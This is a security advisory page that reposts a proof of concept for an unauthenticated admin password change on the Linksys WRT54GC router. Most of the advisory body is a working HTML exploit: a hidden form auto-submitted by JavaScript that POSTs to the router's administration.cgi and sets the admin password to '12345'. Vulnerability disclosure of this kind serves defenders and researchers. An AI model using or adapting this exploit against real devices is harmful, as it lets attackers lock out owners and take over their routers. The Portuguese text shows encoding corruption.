Computer Security

Security Advisory: Linksys WRT54GC - Admin Password Change (POC)
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Linksys WRT54GC wireless routers unauthorized password change

From:gabriel_(at)_falandodeseguranca.com <gabriel_(at)_falandodeseguranca.com>
Date:20.04.2009
Subject:Linksys WRT54GC - Admin Password Change (POC)

<!--
***************
* Gabriel Lima - gabriel@falandodeseguranca.com
* www.falandodeseguranca.com
***************

(English:)
       Linksys WRT54GC - Administration Password Change
The Router WRT54GC doesn't seem to check authentication from the administrator in it's .CGI files, accepting any POST
request,
as a password change. Below, follows an example of a form that changes the password and administrator login to '12345'.
Tested on model Linksys WRT54GC - Firmware Version: v1.05.7 - Local and Remote administration


(Portuguкs:)
       Linksys WRT54GC - Mudanзa de Senha
O roteador WRT54GC parece nгo verificar a autenticaзгo do administrador em seus arquivos .CGI, aceitando qualquer envio
de POST como o de mudanзa de senha. Abaixo, um exemplo de formulбrio que muda a senha e o login de administrador para
12345.
Testado no modelo Linksys WRT54GC - Firmware Version: v1.05.7 - Administraзгo Local e remota.


Credits:
Gabriel Lima. gabriel@falandodeseguranca.com
-->

<html><body>
<form method="POST" action="http://IP_ADDRESS:8080/administration.cgi" name="senha" ENCTYPE="multipart/form-data">
<INPUT type="hidden" name="sysPasswd" value="12345" maxLength=20 size=21>
<INPUT type="hidden" name="sysConfirmPasswd" value="12345" maxLength=20 size=21>
</form>

<!-- Cуdigo de envio automбtico do formulбrio -->

<SCRIPT language="JavaScript">
 document.senha.submit();
</SCRIPT>

</body></html>
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server